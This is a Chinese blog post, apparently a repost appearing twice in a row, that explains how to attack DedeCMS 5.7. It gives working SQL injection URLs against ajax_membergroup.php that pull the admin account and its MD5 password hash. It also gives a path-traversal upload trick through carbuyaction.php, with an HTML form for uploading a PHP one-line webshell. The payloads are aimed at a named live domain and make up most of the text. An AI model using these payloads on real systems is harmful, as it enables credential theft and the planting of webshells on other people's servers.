织梦5.7注入加上传漏洞
2016-03-21 10:51
267 查看
织梦5.7注入加上传漏洞
分类:安全 | 2012-05-5 | 撸过12,571次
2人扯谈
会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
会员中心有上传动作过滤不严,导致上传漏洞
详细说明:
①注入漏洞。
这站 http://www. href="http://www.webshell.cc/" target=_blank>webshell.cc/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问
“/member/ajax_membergroup.php?action=post&membergroup=1”
页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin www.2cto.com
查看管理员密码
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5没解出来 只好测试第二个方法
②上传漏洞:
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
<form action="=../dialog/select_soft_post]
<[/url">http://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
本站内容均为原创,转载请务必保留署名与链接!
织梦5.7注入加上传漏洞:http://www.webshell.cc/3520.html
分类:安全 | 2012-05-5 | 撸过12,571次
2人扯谈
会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
会员中心有上传动作过滤不严,导致上传漏洞
详细说明:
①注入漏洞。
这站 http://www. href="http://www.webshell.cc/" target=_blank>webshell.cc/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问
“/member/ajax_membergroup.php?action=post&membergroup=1”
页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin www.2cto.com
查看管理员密码
http://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5没解出来 只好测试第二个方法
②上传漏洞:
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
<form action="=../dialog/select_soft_post]
<[/url">http://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
本站内容均为原创,转载请务必保留署名与链接!
织梦5.7注入加上传漏洞:http://www.webshell.cc/3520.html
相关文章推荐
- dede最新漏洞以及黑客木马特征
- --《元哥的语录》--。。。。
- <div>里用display:block有用么?
- 我建了一个QQ群,别人如何不需要验证就能加入我的群
- Word文档中文字下有红色或绿色波浪线怎么去...
- DEDE5.7友情链接分类调用代码
- 网页背景音乐的HTML代码是什么?
- arclist标签在文章页列表页调用所有(全站)栏目最新文章热门文章的方法 [复制链接]
- DedeCMS让{dede:list}标签支持weight权重排序、flag属性
- dede list 2个不同栏目如何调用同一个栏目文章,类似副栏目?
- PHP错误报告等级设置 ,不再着ERROR的道
- ecshop促销时间倒计时效果
- ecshop 推荐商品
- PHP大小写:函数名和类名不区分,变量名区分
- javascript 函数和变量是区分大小写的
- 【转载】关于font-size:100%
- font:12px/1.5 表示什么意思
- css让图片变成圆角矩形 border-radius: 15px;
- Alt+Tab键的窗口切换界面一直不消失
- PHP:Notice: Undefined index: submit in